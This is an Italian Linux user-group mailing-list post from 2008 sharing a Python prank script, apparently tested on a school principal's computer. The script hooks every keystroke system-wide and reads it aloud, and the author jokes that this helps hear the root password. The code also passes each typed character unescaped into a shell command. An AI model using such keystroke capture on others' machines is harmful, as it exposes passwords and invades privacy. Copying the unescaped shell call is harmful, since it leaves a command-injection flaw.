[gl-como] Scriptino testato nel computer del Preside

Flavio Peroco Premoli flaper87@gmail.com
Gio 19 Giu 2008 09:05:00 CEST

Buon Giorno!

A richiesta di tutti faccio girare lo scriptino che abbiamo provato ieri
nel computer del preside, la scrivo direttamente perché non so se sono
ammessi attachments nella mailing list.

Il mio consiglio è usare threading per lanciare i comandi se no fa un po
schifo perché per scrivere devi prima aspettare che finisca di parlare
dopo appare la lettera, comunque se si vuole far incazz* a la persona
allora va bene cosi :P

Come vedete lo script passa 2 volte i tasti sbagliati cosi non sbagliamo
a sentire la password di root :P, comunque si può migliorare tantissimo.

Vi auguro una bella giornata.
Ci sentiamo.

P.S: dipendenze: pyatspi

#!/usr/bin/env python

import pyatspi
import os

if os.path.isfile("/usr/bin/espeak"):
     command = "/usr/bin/espeak -v it %s"
else:
     command = "python -c 'print \a; print'; %s"

def callback(event):
     #Ho messo pyatspi.allModifiers() cosi non dovevo scegliere che
tasti prendere,
     # e ho semplicemente messo questo if per fa passare solo i tasti
[a-z][0-9], niente SHIFT_LEFT
     # o cose del genere, anche se la password li puo usare. hmmm
(BUGGGGG) :)
     if len(event.event_string) > 1:
         return

     os.system( command % event.event_string )

reg = pyatspi.Registry

reg.registerKeystrokeListener(callback, mask=pyatspi.allModifiers(),
kind=(pyatspi.constants.KEY_PRESSED_EVENT,
pyatspi.constants.KEY_PRESSED_EVENT))

reg.start()

--
Flavio Percoco Premoli, A.K.A. [Flaper87]
http://www.flaper87.org